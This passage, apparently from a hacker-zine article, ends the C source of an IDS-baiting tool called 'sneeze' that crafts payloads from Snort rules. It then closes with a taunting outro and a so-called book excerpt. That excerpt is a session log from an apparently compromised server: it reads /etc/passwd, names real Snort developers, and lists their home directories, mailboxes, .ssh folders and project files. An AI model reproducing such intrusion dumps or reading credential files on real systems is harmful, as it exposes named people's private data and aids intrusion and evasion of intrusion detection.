		fill_random_data (ptr, (buflen - oldlen));

		if (sptr->offset)
		{
			ptr = buf + sptr->offset;
			pos = sptr->offset;
		}
		else
		{
			unsigned int d, w, padbytes;

			d = sptr->distance;
			w = sptr->within;

			if (d && !w)
				w = d;

			/* this should never happen */
			if (d > w)
				d = w;
	
			oldlen = buflen;
			padbytes = random_number (d, w);
			inclen = buflen + padbytes;

			buf = xrealloc (buf, inclen);
			ptr = buf + oldlen;
			fill_random_data (ptr, padbytes);
			ptr += padbytes;
			pos += padbytes;
		}

		/* finally, fill in our data */
		buflen += sptr->attack_len;

		buf = xrealloc (buf, buflen);
		ptr = buf + pos;
		memcpy (ptr, sptr->attack_data, sptr->attack_len);

		if (sptr->case_insensitive)
			mix_case (ptr, sptr->attack_len);
			


	}

	/* finally, extend the buffer if dsize is specified */
	if (rule->dsize && (buflen != rule->dsize))
	{
		unsigned int oldblen = buflen;

		buflen = rule->dsize;
		buf = xrealloc (buf, buflen);
		ptr = buf;
		ptr += oldblen;
		fill_random_data (ptr, (buflen - oldblen));
	}

	*sizeptr = buflen;
	return buf;
}


/* fill buf with random data */

void
fill_random_data (char *buf, unsigned int len)
{
	unsigned int i;

	for (i = 0; i < len; i++)
	{
		/* let's not make it completely random */
		unsigned char randbyte = 0;

		while (!(isalnum (randbyte)))
			randbyte = (rand() & 0xff);

		buf[i] = (char) randbyte;

	}

	return;
}


/* generate random number between lo and hi */

int
random_number (int lo, int hi)
{
	int result;

	result = rand ();
	result %= ((hi - lo) + 1);
	result += lo;
	return result;
}


/* some implementations don't allow reallocs with 0 */

void *
xrealloc (void *ptr, size_t size)
{
	void *result;

	if (!size)
		size = 4;

	result = realloc (ptr, size);

	if (result == NULL)
	{
		perror ("realloc");
		exit (EXIT_FAILURE);
	}

	return result;
}

 


--[ 4. Outro

  "I haven't been with a woman in nine months." 
  - Mike Tyson

Fuck Snort. Oh, and these techniques should of course be applicable to a
variety of other IDS's, all of which probably have rule lists imported from
snort.


4.1 Self-Promotion

You can expect a user's manual for my sneeze tool to appear as its own
seperate article sometime in the near future. In addition, I would like to
notify you of my new and upcoming book, Hacker's Challenge Part III. Like
the past two books in this series, I discuss real life forensic and hacking
investigation conundrums and the solutions. These puzzles will get your
axons firing and stimulate your frontal cortex more than any other security
book you've ever seen. "What does this have to do with this article?" -
you may inquisitively ask. Well, you may recall from above some of the
poorly written snort rules. Attached is a small excerpt from Hacker's
Challenge III. Match your wits against the attackers as you try to figure
out how they "owned" this box. Would this break-in incident have occurred
if the administrators would have written more rigorous snort rules?

cd /home;
cat /etc/passwd;
root:*:0:0:Charlie &:/root:/usr/local/bin/tcsh
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
uucp:*:66:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
www:*:67:67:HTTP server:/var/www:/sbin/nologin
named:*:70:70:BIND Name Service Daemon:/var/named:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
roesch:*:1000:1000:Martin Roesch:/home/roesch:/usr/local/bin/tcsh
jpavlick:*:1001:1001:John Pavlick:/home/jpavlick:/usr/local/bin/tcsh
dr:*:1002:1002:Dragos Ruiu:/home/dr:/usr/local/bin/tcsh
mikef:*:1003:1003:Mike Forostiak:/home/mikef:/usr/local/bin/tcsh
tburgess:*:1004:1004:Tom Burgess:/home/tburgess:/usr/local/bin/tcsh
bmc:*:1005:1005:Brian Caswell:/home/bmc:/usr/local/bin/tcsh
phil:*:1006:1006:Phil Cataldi:/home/phil:/usr/local/bin/tcsh
jed:*:1007:1007:Jed Haile:/home/jed:/usr/local/bin/tcsh
andrewb:*:1008:1008:Andrew Baker:/home/andrewb:/usr/local/bin/tcsh
sfuser1:*:1009:1009:remote user:/home/sfuser1:/bin/sh
jasonl:*:1010:1010:Jason Larsen:/home/jasonl:/usr/local/bin/tcsh
cmg:*:1011:1011:Chris Green:/home/cmg:/usr/local/bin/tcsh
sschwing:*:1012:1012:Steve Schwinger:/home/sschwing:/usr/local/bin/tcsh
ls -al *;
andrewb:
total 1116
drwxr-xr-x   6 andrewb  andrewb     512 --- -- ---- .
drwxr-xr-x  15 root     wheel       512 --- -- ---- ..
drwx------   3 andrewb  andrewb     512 --- -- ---- .BitchX
-rw-r--r--   1 andrewb  andrewb     769 --- -- ---- .cshrc
-rw-------   1 andrewb  andrewb    2807 --- -- ---- .history
-rw-r--r--   1 andrewb  andrewb     318 --- -- ---- .login
-rw-r--r--   1 andrewb  andrewb     105 --- -- ---- .mailrc
-rw-r--r--   1 andrewb  andrewb     201 --- -- ---- .profile
-rw-------   1 andrewb  andrewb     128 --- -- ---- .rhosts
drwx------   2 andrewb  andrewb     512 --- -- ---- .ssh
-rw-r--r--   1 andrewb  andrewb     216 --- -- ---- .vimrc
-rw-r--r--   1 andrewb  andrewb  134007 --- -- ---- barnyard-0.1.0-beta3.tar.gz
-rw-r--r--   1 andrewb  andrewb  156397 --- -- ---- barnyard-0.1.0-beta4.tar.gz
-rw-r--r--   1 andrewb  andrewb  147971 --- -- ---- barnyard-sf.tgz
-rw-r--r--   1 andrewb  andrewb   64551 --- -- ---- parser.tgz
-rw-r--r--   1 andrewb  andrewb    6630 --- -- ---- solaris.diff
drwxr-xr-x   3 andrewb  andrewb     512 --- -- ---- src
drwxr-xr-x   2 andrewb  andrewb     512 --- -- ---- src.old

bmc:
total 1143996
-rw-r--r--   1 bmc   bmc      5102865 --- -- ---- (X-Ecutioners) It's Going Down.mp3
drwxr-xr-x  18 bmc   bmc         3072 --- -- ---- .
drwxr-xr-x  15 root  wheel        512 --- -- ---- ..
drwx------   3 bmc   bmc          512 --- -- ---- .BitchX
-rw-r--r--   1 bmc   bmc           88 --- -- ---- .bitchxc
-rw-r--r--   1 bmc   bmc          126 --- -- ---- .bitchxrc
-rw-r--r--   1 bmc   bmc          769 --- -- ---- .cshrc
-rw-r--r--   1 bmc   bmc          126 --- -- ---- .epic4rc
-rw-r--r--   1 bmc   bmc          126 --- -- ---- .epicrc
-rw-------   1 bmc   bmc         2180 --- -- ---- .history
-rw-------   1 bmc   bmc           40 --- -- ---- .ircrc
-rw-r--r--   1 bmc   bmc          318 --- -- ---- .login
-rw-------   1 bmc   bmc          104 --- -- ---- .lynx_cookies
-rw-r--r--   1 bmc   bmc          105 --- -- ---- .mailrc
-rw-r--r--   1 bmc   bmc          123 --- -- ---- .muttrc
-rw-r--r--   1 bmc   bmc          201 --- -- ---- .profile
-rw-------   1 bmc   bmc          128 --- -- ---- .rhosts
-rw-r--r--   1 bmc   bmc           84 --- -- ---- .screenrc
drwx------   2 bmc   bmc          512 --- -- ---- .ssh
-rw-r--r--   1 bmc   bmc      1009016 --- -- ---- 06-02-2002.tgz
-rw-------   1 bmc   bmc         8862 --- -- ---- 100Mb_tapping1.pdf
-rw-------   1 bmc   bmc         9117 --- -- ---- 100Mb_tapping2.pdf
-rw-r--r--   1 bmc   bmc      1617800 --- -- ---- 2002-06-24-b.zip
-rw-r--r--   1 bmc   bmc       888503 --- -- ---- 2002-06-24.zip
-rw-r--r--   1 bmc   bmc        90063 --- -- ---- 7350php.tgz
-rw-------   1 bmc   bmc      1667444 --- -- ---- BitchX-1.0c17.core
-rw-r--r--   1 bmc   bmc       287866 --- -- ---- IDSk9-sig-3.0-3-S15.bin
-rw-r--r--   1 bmc   bmc         7603 --- -- ---- IDSk9-sig-3.0-3-S15.readme
drwx------   2 bmc   bmc          512 --- -- ---- Mail
-rw-r--r--   1 bmc   bmc       245808 --- -- ---- NetRecon-CVE-200.xls
drwxr-xr-x   4 bmc   bmc          512 --- -- ---- SENSIG30
-rw-r--r--   1 bmc   bmc       207539 --- -- ---- SENSIG30.tar.Z
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- WWW
drwxr-xr-x   4 bmc   bmc          512 --- -- ---- advice.networkice.com
-rw-r--r--   1 bmc   bmc      2452743 --- -- ---- arin.20020501
-rw-r--r--   1 bmc   bmc       985426 --- -- ---- autox.tgz
-rw-------   1 bmc   bmc         2741 --- -- ---- barnyard.server.gz
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- bin
-rw-r--r--   1 bmc   bmc       285975 --- -- ---- blah.bin
-rw-r--r--   1 bmc   bmc         9277 --- -- ---- byebye-small.jpg
-rw-r--r--   1 bmc   bmc          858 --- -- ---- crashme.cap
-rw-r--r--   1 bmc   bmc    121431654 --- -- ---- csv14full.exe
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- cvsroot
-rwxr-xr-x   1 bmc   bmc          846 --- -- ---- dhcpclient
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- docs
drwxr-xr-x   5 bmc   bmc         6144 --- -- ---- ethereal-0.9.3
-rw-r--r--   1 bmc   bmc      2961451 --- -- ---- ethereal-0.9.3.tar.gz
drwxr-xr-x   4 bmc   bmc          512 --- -- ---- exploits
-rw-r--r--   1 bmc   bmc        12385 --- -- ---- face-sm.jpg
-rw-r--r--   1 bmc   bmc        11452 --- -- ---- face_2-sm.jpg
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- gzsig-0.1
-rw-r--r--   1 bmc   bmc        35494 --- -- ---- gzsig-0.1.tar.gz
-rw-r--r--   1 bmc   bmc        10670 --- -- ---- head.jpg
-rw-r--r--   1 bmc   bmc     80921107 --- -- ---- hl1109.exe
-rwxr-xr-x   1 bmc   bmc         1967 --- -- ---- honeysuckle
-rw-r--r--   1 bmc   bmc         2891 --- -- ---- inout-1.0-tar.gz
-rw-r--r--   1 bmc   bmc         1000 --- -- ---- ip360
-rw-r--r--   1 bmc   bmc       846336 --- -- ---- iss HigkRiskCVEs.xls
-rw-r--r--   1 bmc   bmc       682927 --- -- ---- iss.csv
-rw-r--r--   1 bmc   bmc         3925 --- -- ---- logo.gif
-rw-------   1 bmc   bmc          735 --- -- ---- mbox
-rw-------   1 bmc   bmc       628680 --- -- ---- mbox.gz
-rw-------   1 bmc   bmc      1169120 --- -- ---- mbox2.gz
-rw-r--r--   1 bmc   bmc        18385 --- -- ---- miche-small.jpg
drwxr-xr-x   3 bmc   bmc         1536 --- -- ---- mp3
-rw-r--r--   1 bmc   bmc       316092 --- -- ---- msr.tar.gz
-r-xr-xr-x   1 bmc   bmc       442368 --- -- ---- mutt
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- packets
-rw-r--r--   1 bmc   bmc        33263 --- -- ---- polo.jpg
-rw-------   1 bmc   bmc          540 --- -- ---- postponed
-rw-r--r--   1 bmc   bmc         9946 --- -- ---- profile.JPG
-rw-r--r--   1 bmc   bmc        13629 --- -- ---- profile_2-sm.jpg
-rw-r--r--   1 bmc   bmc        56230 --- -- ---- quals.csv
-rw-r--r--   1 bmc   bmc     55237030 --- -- ---- referer
-rw-r--r--   1 bmc   bmc        18329 --- -- ---- renfest-small.jpg
-rw-r--r--   1 bmc   bmc         1298 --- -- ---- segfault_ca.pem
-rw-------   1 bmc   bmc       114176 --- -- ---- sev_export_cve.xls
-rwxr-xr-x   1 bmc   bmc         2861 --- -- ---- sforce_ai
-rw-r--r--   1 bmc   bmc         9033 --- -- ---- silc-client-0.8.6.diff
-rw-------   1 bmc   bmc      2000297 --- -- ---- silidef
-rw-r--r--   1 bmc   bmc         1960 --- -- ---- smo.ksh
-rw-r--r--   1 bmc   bmc        40960 --- -- ---- sneeze-1.0.tar
drwxr-xr-x   3 bmc   bmc          512 --- -- ---- snort
-rw-r--r--   1 bmc   bmc       199418 --- -- ---- snort-1.8.5-openbsd-3.0.pkg.tgz
-rw-r--r--   1 bmc   bmc       720692 --- -- ---- snort-1.8.5-solaris-2.8.pkg.gz
-rw-r--r--   1 bmc   bmc     10370832 --- -- ---- snort-cvsroot.tar.gz
-rw-r--r--   1 bmc   bmc     10380309 --- -- ---- snort-cvsroot.tar.gz.1
-rw-r--r--   1 bmc   bmc     11875917 --- -- ---- snort-cvsroot.tar.gz.10
-rw-r--r--   1 bmc   bmc     11929136 --- -- ---- snort-cvsroot.tar.gz.11
-rw-r--r--   1 bmc   bmc     12069901 --- -- ---- snort-cvsroot.tar.gz.12
-rw-r--r--   1 bmc   bmc     12109819 --- -- ---- snort-cvsroot.tar.gz.13
-rw-r--r--   1 bmc   bmc     12293670 --- -- ---- snort-cvsroot.tar.gz.14
-rw-r--r--   1 bmc   bmc     12308852 --- -- ---- snort-cvsroot.tar.gz.15
-rw-r--r--   1 bmc   bmc     12361860 --- -- ---- snort-cvsroot.tar.gz.16
-rw-r--r--   1 bmc   bmc     12465104 --- -- ---- snort-cvsroot.tar.gz.17
-rw-r--r--   1 bmc   bmc     12471095 --- -- ---- snort-cvsroot.tar.gz.18
-rw-r--r--   1 bmc   bmc     12481160 --- -- ---- snort-cvsroot.tar.gz.19
-rw-r--r--   1 bmc   bmc     10433614 --- -- ---- snort-cvsroot.tar.gz.2
-rw-r--r--   1 bmc   bmc     12569554 --- -- ---- snort-cvsroot.tar.gz.20
-rw-r--r--   1 bmc   bmc     10508638 --- -- ---- snort-cvsroot.tar.gz.3
-rw-r--r--   1 bmc   bmc     10896512 --- -- ---- snort-cvsroot.tar.gz.4
-rw-r--r--   1 bmc   bmc     11313018 --- -- ---- snort-cvsroot.tar.gz.5
-rw-r--r--   1 bmc   bmc     11353208 --- -- ---- snort-cvsroot.tar.gz.6
-rw-r--r--   1 bmc   bmc     11397599 --- -- ---- snort-cvsroot.tar.gz.7
-rw-r--r--   1 bmc   bmc     11620457 --- -- ---- snort-cvsroot.tar.gz.8
-rw-r--r--   1 bmc   bmc     11829229 --- -- ---- snort-cvsroot.tar.gz.9
-rw-------   1 bmc   bmc         2846 --- -- ---- snort.server.gz
-rw-------   1 bmc   bmc      1442726 --- -- ---- snort_log
-rwxr-xr-x   1 bmc   bmc       334287 --- -- ---- stunnel
-rw-r--r--   1 bmc   bmc          919 --- -- ---- submit
-rw-------   1 bmc   bmc      2073290 --- -- ---- teso
-rw-r--r--   1 bmc   bmc        10197 --- -- ---- thumb1-sm.jpg
-rw-r--r--   1 bmc   bmc     53106716 --- -- ---- uniq
-rw-r--r--   1 bmc   bmc          614 --- -- ---- urls
-rw-r--r--   1 bmc   bmc         9690 --- -- ---- wireless-scanner.png
drwxr-x---   4 bmc   bmc          512 --- -- ---- x2src
-rw-r--r--   1 bmc   bmc        27369 --- -- ---- x2src.tgz

cmg:
total 47754
drwxr-xr-x  15 cmg   cmg        1024 --- -- ---- .
drwxr-xr-x  15 root  wheel       512 --- -- ---- ..
-rw-r--r--   1 cmg   cmg         843 --- -- ---- .cshrc
-rw-------   1 cmg   cmg        2538 --- -- ---- .history
drwxr-xr-x   9 cmg   cmg        1024 --- -- ---- .irc
-rw-r--r--   1 cmg   cmg         247 --- -- ---- .ircrc
-rw-r--r--   1 cmg   cmg          71 --- -- ---- .lice_updates.txt
-rw-r--r--   1 cmg   cmg         318 --- -- ---- .login
-rw-r--r--   1 cmg   cmg         105 --- -- ---- .mailrc
-rw-r--r--   1 cmg   cmg         201 --- -- ---- .profile
-rw-------   1 cmg   cmg         128 --- -- ---- .rhosts
-rw-r--r--   1 cmg   cmg        3396 --- -- ---- .screenrc
drwx------   2 cmg   cmg         512 --- -- ---- .ssh
-rw-r--r--   1 cmg   cmg     1408922 --- -- ---- 42.zip
-rw-------   1 cmg   cmg      318008 --- -- ---- IRCLOG.#antisnort
-rw-------   1 cmg   cmg       28173 --- -- ---- IRCLOG.#snortschemas
-rw-r--r--   1 cmg   cmg       12360 --- -- ---- MAKEDEV
-rw-r--r--   1 cmg   cmg     1594880 --- -- ---- Snort185Win32.exe
-rw-r--r--   1 cmg   cmg       30370 --- -- ---- bdb-eval.tar.gz
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- bin
drwxr-xr-x   7 cmg   cmg         512 --- -- ---- build
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- cdrom
-rw-r--r--   1 cmg   cmg    14426372 --- -- ---- cvsroot.tar.gz
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- downloads
-rw-r--r--   1 cmg   cmg      662234 --- -- ---- epic.tar.gz
drwxr-xr-x   9 cmg   cmg        1024 --- -- ---- epic4-1.1.5
-rw-r--r--   1 cmg   cmg         614 --- -- ---- id_dsa.pub
-rw-r--r--   1 cmg   cmg      206962 --- -- ---- irc.tar.gz
-rw-r--r--   1 cmg   cmg      208906 --- -- ---- irc.tgz
-rw-r--r--   1 cmg   cmg        6040 --- -- ---- named.tgz
-rw-r--r--   1 cmg   cmg       12017 --- -- ---- pm.rc
-rw-r--r--   1 cmg   cmg     1726082 --- -- ---- snort-1.8.7.tar.gz
drwxr-xr-x   9 cmg   cmg        1024 --- -- ---- snort-1.9
-r--r--r--   1 cmg   cmg     1794602 --- -- ---- snort-20020129-1stable.src.rpm
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- snort-rpms
drwxr-xr-x   7 cmg   cmg        7680 --- -- ---- snort-stable
-rw-r--r--   1 cmg   cmg     1807323 --- -- ---- snort-stable-snapshot.tar.gz
-rw-r--r--   1 cmg   cmg       47825 --- -- ---- snot-0.92a.tar.gz
drwxr-xr-x   5 cmg   cmg         512 --- -- ---- src
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- tmp
drwxr-xr-x   2 cmg   cmg        1024 --- -- ---- tocerb

dr:
total 417076
drwxr-xr-x   6 dr    dr         3072 --- -- ---- .
drwxr-xr-x  15 root  wheel       512 --- -- ---- ..
-rw-r--r--   1 dr    dr          769 --- -- ---- .cshrc
-rw-------   1 dr    dr         1829 --- -- ---- .history
-rw-r--r--   1 dr    dr          318 --- -- ---- .login
-rw-r--r--   1 dr    dr          105 --- -- ---- .mailrc
-rw-r--r--   1 dr    dr          201 --- -- ---- .profile
-rw-------   1 dr    dr          128 --- -- ---- .rhosts
drwx------   2 dr    dr          512 --- -- ---- .ssh
-rw-r--r--   1 dr    dr         1022 --- -- ---- 10.1.1.35
-rw-r--r--   1 dr    dr          216 --- -- ---- Alerts.php
-rw-r--r--   1 dr    dr         8276 --- -- ---- AlertsData.php
-rw-r--r--   1 dr    dr          801 --- -- ---- AlertsGraphs.php
-rw-r--r--   1 dr    dr         7784 --- -- ---- AlertsIncident.php
-rw-r--r--   1 dr    dr         7893 --- -- ---- AlertsQuery.php
-rw-r--r--   1 dr    dr         7633 --- -- ---- AlertsRecent.php
-rw-r--r--   1 dr    dr         5316 --- -- ---- AlertsReports.php
-rw-r--r--   1 dr    dr         6996 --- -- ---- AlertsStats.php
-rw-r--r--   1 dr    dr         2052 --- -- ---- Browse-or.jpg
-rw-r--r--   1 dr    dr         2100 --- -- ---- Browse-y.jpg
-rw-r--r--   1 dr    dr         2070 --- -- ---- Browse-yp.jpg
-rw-r--r--   1 dr    dr          224 --- -- ---- Config.php
-rw-r--r--   1 dr    dr        20731 --- -- ---- ConfigNet.php
-rw-r--r--   1 dr    dr        13932 --- -- ---- ConfigSnort.php
-rw-r--r--   1 dr    dr         8482 --- -- ---- ConfigUsers.php
-rw-r--r--   1 dr    dr          229 --- -- ---- Help.php
-rw-r--r--   1 dr    dr         1470 --- -- ---- Login.php
-rw-r--r--   1 dr    dr          250 --- -- ---- Logout.php
-rw-r--r--   1 dr    dr         2102 --- -- ---- Reports-or.jpg
-rw-r--r--   1 dr    dr         2179 --- -- ---- Reports-y.jpg
-rw-r--r--   1 dr    dr         2328 --- -- ---- Reports-yp.jpg
-rw-r--r--   1 dr    dr        18510 --- -- ---- Rules.php
-rw-r--r--   1 dr    dr        10088 --- -- ---- RulesActive.php
-rw-r--r--   1 dr    dr        33149 --- -- ---- RulesBrowse.php
-rw-r--r--   1 dr    dr        30918 --- -- ---- RulesEdit.php
-rw-r--r--   1 dr    dr        11513 --- -- ---- RulesFiles.php
-rw-r--r--   1 dr    dr         2165 --- -- ---- RulesImport.php
-rw-r--r--   1 dr    dr         9882 --- -- ---- RulesInactive.php
-rw-r--r--   1 dr    dr        31789 --- -- ---- RulesNew.php
-rw-r--r--   1 dr    dr        22506 --- -- ---- RulesSearch.php
-rw-r--r--   1 dr    dr        23103 --- -- ---- RulesType.php
-rw-r--r--   1 dr    dr         7594 --- -- ---- RulesVars.php
-rw-r--r--   1 dr    dr          209 --- -- ---- Sensor.php
-rw-r--r--   1 dr    dr         2721 --- -- ---- SensorDisk.php
-rw-r--r--   1 dr    dr         1821 --- -- ---- SensorProcess.php
-rw-r--r--   1 dr    dr          804 --- -- ---- SensorSnort.php
-rw-r--r--   1 dr    dr         1022 --- -- ---- SensorSyslog.php
-rw-r--r--   1 dr    dr      1607168 --- -- ---- Snort Win32.exe
-rw-r--r--   1 dr    dr      1570304 --- -- ---- Snort Win32.msi
-rw-r--r--   1 dr    dr      1298944 --- -- ---- Snort-182.exe
-rw-r--r--   1 dr    dr      1526784 --- -- ---- Snort183Win32.exe
-rw-r--r--   1 dr    dr      1298944 --- -- ---- SnortWin32-183.exe
-rw-r--r--   1 dr    dr      1644032 --- -- ---- SnortWin32-183F.exe
-rw-r--r--   1 dr    dr     63856017 --- -- ---- base29.tgz
-rw-r--r--   1 dr    dr     73947166 --- -- ---- base29.tgz_10_2_01
-rw-r--r--   1 dr    dr     56005424 --- -- ---- base29.tgz_7_25_01
-rw-r--r--   1 dr    dr      2262062 --- -- ---- bsd
-rwxr-xr-x   1 dr    dr          332 --- -- ---- buildfxp0
-rwxr-xr-x   1 dr    dr          332 --- -- ---- buildfxp0.sh
-rwxr-xr-x   1 dr    dr          332 --- -- ---- buildfxp1
-rwxr-xr-x   1 dr    dr          332 --- -- ---- buildfxp1.sh
drwxr-xr-x   2 dr    dr         5120 --- -- ---- buttons
-rw-r--r--   1 dr    dr        61476 --- -- ---- buttons.tgz
-rw-r--r--   1 dr    dr        10435 --- -- ---- data_analysis.php
-rw-r--r--   1 dr    dr         3879 --- -- ---- day_graph.php
-rw-r--r--   1 dr    dr         9297 --- -- ---- dst_port_summary.php
-rw-r--r--   1 dr    dr         8654 --- -- ---- event_display.php
-rw-r--r--   1 dr    dr         7623 --- -- ---- events.php
-rw-r--r--   1 dr    dr         7982 --- -- ---- events_actionpage.php
-rw-r--r--   1 dr    dr          337 --- -- ---- fill.html
-rw-r--r--   1 dr    dr          337 --- -- ---- fxp0stat.php
-rw-r--r--   1 dr    dr         3869 --- -- ---- hr_graph.php
-rw-r--r--   1 dr    dr         4080 --- -- ---- incident_name_page.php
-rw-r--r--   1 dr    dr         6630 --- -- ---- incident_page.php
-rw-r--r--   1 dr    dr         3928 --- -- ---- ip_graph.php
-rw-r--r--   1 dr    dr       204529 --- -- ---- j.tgz
-rw-r--r--   1 root  dr       133029 --- -- ---- libprelude-latest.tar.gz
-rw-r--r--   1 dr    dr         1457 --- -- ---- mfoot.php
-rw-r--r--   1 dr    dr         5281 --- -- ---- mfrm.php
-rw-r--r--   1 dr    dr         6034 --- -- ---- mhead.php
-rw-r--r--   1 dr    dr        74936 --- -- ---- nbut.tgz
-rw-r--r--   1 dr    dr         9035 --- -- ---- packet_display.php
-rw-r--r--   1 dr    dr         3920 --- -- ---- port_graph.php
-rw-r--r--   1 root  dr       424844 --- -- ---- prelude-nids-latest.tar.gz
-rw-r--r--   1 dr    dr         6254 --- -- ---- query_page.php
-rw-r--r--   1 dr    dr        30395 --- -- ---- redit.php
drwxr-xr-x   2 dr    dr         1024 --- -- ---- rules
-rwxr-xr-x   1 dr    dr          167 --- -- ---- rulesdiff
-rwxr-xr-x   1 dr    dr          165 --- -- ---- rulesupdate
-rw-r--r--   1 dr    dr          881 --- -- ---- save_report.php
-rw-r--r--   1 dr    dr         8230 --- -- ---- search.php
drwxrwxrwx   4 dr    dr          512 --- -- ---- sf_final
-rw-r--r--   1 dr    dr       391292 --- -- ---- sf_final.tgz
-rw-r--r--   1 dr    dr      6326083 --- -- ---- sfht.tgz
-rw-r--r--   1 dr    dr         5563 --- -- ---- sfire.jpg
-rw-r--r--   1 dr    dr         6538 --- -- ---- sflogo.jpg
-rw-r--r--   1 dr    dr        12623 --- -- ---- sfpost.tgz
-rw-r--r--   1 dr    dr         4772 --- -- ---- show_incident_report.php
-rw-r--r--   1 dr    dr         5051 --- -- ---- show_query_report.php
-rwxr-xr-x   1 dr    dr        18746 --- -- ---- snorthup
-rw-r--r--   1 dr    dr         1514 --- -- ---- snortstat.php
-rw-r--r--   1 dr    dr         9283 --- -- ---- src_ip_summary.php
-rw-r--r--   1 dr    dr         7504 --- -- ---- stats_actionpage.php
-rw-r--r--   1 dr    dr          648 --- -- ---- style.php
-rw-r--r--   1 dr    dr         1566 --- -- ---- syslog.php
-rw-r--r--   1 dr    dr         3567 --- -- ---- time.php
-rw-r--r--   1 dr    dr         1769 --- -- ---- top.php
-rw-r--r--   1 dr    dr           33 --- -- ---- user.f
-rw-r--r--   1 dr    dr          529 --- -- ---- webinterface.php
-rw-r--r--   1 dr    dr          702 --- -- ---- yframe14mod.jpg
-rw-r--r--   1 dr    dr          587 --- -- ---- yframe8mod.jpg
-rw-r--r--   1 dr    dr         3218 --- -- ---- yfrm.php
-rw-r--r--   1 dr    dr        21548 --- -- ---- yfrm.tgz

jasonl:
total 14470
drwxr-xr-x   3 jasonl  jasonl      512 --- -- ---- .
drwxr-xr-x  15 root    wheel       512 --- -- ---- ..
-rw-r--r--   1 jasonl  jasonl      769 --- -- ---- .cshrc
-rw-------   1 jasonl  jasonl     1061 --- -- ---- .history
-rw-r--r--   1 jasonl  jasonl      318 --- -- ---- .login
-rw-r--r--   1 jasonl  jasonl      105 --- -- ---- .mailrc
-rw-r--r--   1 jasonl  jasonl      201 --- -- ---- .profile
-rw-------   1 jasonl  jasonl      128 --- -- ---- .rhosts
drwx------   2 jasonl  jasonl      512 --- -- ---- .ssh
-rw-r--r--   1 jasonl  jasonl     7503 --- -- ---- cannon.c
-rw-r--r--   1 jasonl  jasonl      205 --- -- ---- cannon.h
-rw-r--r--   1 jasonl  jasonl  5846298 --- -- ---- jason.tmp.tar
-r--r--r--   1 jasonl  jasonl   326290 --- -- ---- mcrypt-2.5.10.tar.gz
-rw-r--r--   1 jasonl  jasonl    18777 --- -- ---- mstring.c
-rw-r--r--   1 jasonl  jasonl     1486 --- -- ---- mstring.h
-rw-r--r--   1 jasonl  jasonl   204849 --- -- ---- mysql.tgz
-rw-r--r--   1 jasonl  jasonl   799182 --- -- ---- mysql_db_setup
-rw-r--r--   1 jasonl  jasonl      258 --- -- ---- mysql_system_setup
-rw-r--r--   1 jasonl  jasonl    99603 --- -- ---- nitro.c
-rw-r--r--   1 jasonl  jasonl    10457 --- -- ---- php_nitro.h
-rwxr-xr-x   1 jasonl  jasonl    14590 --- -- ---- sfserver

jed:
total 58450
drwxr-xr-x   5 jed   jed        1024 --- -- ---- .
drwxr-xr-x  15 root  wheel       512 --- -- ---- ..
-rw-r--r--   1 jed   jed         769 --- -- ---- .cshrc
-rw-------   1 jed   jed        2324 --- -- ---- .history
-rw-r--r--   1 jed   jed         318 --- -- ---- .login
-rw-r--r--   1 jed   jed         105 --- -- ---- .mailrc
-rw-r--r--   1 jed   jed         201 --- -- ---- .profile
-rw-------   1 jed   jed         128 --- -- ---- .rhosts
drwx------   2 jed   jed         512 --- -- ---- .ssh
drwxr-xr-x   2 jed   jed         512 --- -- ---- DB
dr-xr-xr-x   2 jed   jed         512 --- -- ---- Java
-rw-r--r--   1 jed   jed       55581 --- -- ---- NitroDB.h
-rw-r--r--   1 jed   jed       51200 --- -- ---- PacketLibrary.tar
-rw-r--r--   1 jed   jed      716800 --- -- ---- barnyard-sf.tar
-rw-r--r--   1 jed   jed      983040 --- -- ---- barnyard.tar
-rw-r--r--   1 jed   jed      161450 --- -- ---- barnyard.tar.gz
-rw-r--r--   1 jed   jed      245760 --- -- ---- bug.tar
-rwxr-xr-x   1 jed   jed       11743 --- -- ---- hello
-rwxr-xr-x   1 jed   jed     1457796 --- -- ---- httpd
-rw-r--r--   1 jed   jed       33802 --- -- ---- httpd.conf
-rwxr--r--   1 jed   jed     1248812 --- -- ---- libNitroDB-glibc2.1.so.2.0.0
-r--r--r--   1 jed   jed      868364 --- -- ---- libNitroDB-glibc2.2.so.2.0.0
-rwxr-xr-x   1 jed   jed     1247196 --- -- ---- libNitroDB.so
-rwxr--r--   1 jed   jed      719172 --- -- ---- libNitroSock-glibc2.1.so.2.0.0
-r--r--r--   1 jed   jed      756776 --- -- ---- libNitroSock-glibc2.2.so.2.0.0
-rw-r--r--   1 jed   jed      756808 --- -- ---- libNitroSock.so
-rwxr-xr-x   1 jed   jed     2818615 --- -- ---- php
-rw-r--r--   1 jed   jed       51200 --- -- ---- sf.tar
-rwxr-xr-x   1 jed   jed       18533 --- -- ---- sfRebuild
-rw-r--r--   1 jed   jed       20480 --- -- ---- sfRebuild.tar
-rwxr--r--   1 jed   jed        4137 --- -- ---- sfdb.dfl
-rwxr-xr-x   1 jed   jed       13366 --- -- ---- sfserver
-rwxr-xr-x   1 jed   jed       14590 --- -- ---- sfserver.old
-rw-r--r--   1 jed   jed       51200 --- -- ---- sfserver.tar
-rw-r--r--   1 jed   jed     1706939 --- -- ---- snort-1.8.3.tar.gz
-rw-------   1 jed   jed      203065 --- -- ---- snort-unified.log.1011651374
-rwxr-xr-x   1 jed   jed       11762 --- -- ---- snort.dfl
-rwxr-xr-x   1 jed   jed       23168 --- -- ---- snort.src
-rwxr-xr-x   1 jed   jed       59578 --- -- ---- unifiedClient
-rwxr-xr-x   1 jed   jed       75223 --- -- ---- unifiedServer
-rw-------   1 jed   jed    14811859 --- -- ---- unifiedServer.core.gz
